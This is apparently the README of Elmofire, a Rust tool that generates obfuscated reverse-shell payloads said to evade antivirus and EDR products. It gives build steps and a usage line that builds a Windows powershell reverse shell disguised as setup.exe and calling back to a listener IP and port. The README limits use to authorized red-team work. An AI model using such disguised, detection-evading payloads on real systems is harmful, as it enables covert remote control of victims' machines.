🔥Elmofire🔥

Version:

    0.1.0

Description:

Elmofire has been developed to keep up with the demands of security best practices and Red Team exercises. During an assessment, Penetration Testers and Red Team Operators are typically tasked with bypassing the protections in place within corporate infrastructures. As most Anti-Virus and Endpoint Detection and Response (EDR) software solutions detect known malware samples based on heuristics and forensic fingerprinting, the goal of Elmofire is to bypass these detections. While not fully undetectable by every form of EDR on the planet 🌎, Elmofire does an excellent job at generating a randomized and obfuscated payload in an attempt to evade these malware detection services. Currently bypassing all known Anti-Virus solutions on VirusTotal (feel free to generate a payload and see for yourself 😉), the payloads generated by Elmofire are very likely to evade most protection software utilized by organizations throughout the Cyber Security industry.

Dependencies:

NOTE:

    On Linux, Docker runs in the context of the root user by default. To use cross, which uses Docker to compile Rust binaries, it is advised to add your current user to the docker group. E.g.

        sudo usermod -aG docker user

    After executing the above command, run newgrp docker in the context of your user, or simply log out and log back in.

Developed and tested on:

    Pop!_OS 22.04 (Ubuntu)
    Kali Linux 2022.4 (Debian)

Installation:

After following the instructions to install rust, docker, and cross, you can compile and build Elmofire using the cargo build command from inside the Elmofire source code folder.

E.g.

    git clone https://github.com/Elmofire/ef
    cd ef/
    cargo build

Once successfully compiled without errors, the ef binary file will be located in the target/debug path within the Elmofire source code directory. Feel free to relocate this binary to the most convenient directory configured in your PATH environment variable, or simply create an alias that points to the current location of the ef binary.

Usage:

🔥ElmoFire🔥 0.1.0
Author: M4x 5yn74x
Description: Yet another obfuscated payload generator written in Rust

USAGE: ./ef -p <OS-Option> -a <Architecture> -l <Listener> -s <Shell-Type> -o <Output filename>

OPTIONS:
    -a <Architecture>    Architecture: x86_64, i586, i686, arm, armv5te, armv7, aarch64, mips, mipsel, mips64, mips64el
    -h, --help           Print help information
    -l <Listener>        Listening host: <listening ip:port>
    -o <Output>          Output filename: <anything goes>
    -p <OS-Option>       Operating System: windows, linux, darwin, ios, android, solaris, sun-solaris, freebsd, netbsd, illumos
    -s <Shell-Type>      Shell type: cmd, powershell, /bin/bash, /bin/sh, /system/bin/sh, /bin/busybox, /usr/bin/zsh
    -V, --version        Print version information

E.g.

./ef -a x86_64 -l 10.0.0.10:1337 -o setup.exe -p windows -s powershell

Disclaimer:

This tool is intended for Penetration Testers, Security Researchers and Red Teamers alike. DO NOT USE this tool for ILLEGAL purposes or WITHOUT the CONSENT of the parties involved, as agreed upon by LEGAL DOCUMENTATION or PERMISSIVE ACCESS for security consultation or research purposes. We hereby relinquish ALL responsibility for any illegal use of this tool or ANY binary payloads subsequently generated by the tool as described. Please use Elmofire responsibly.
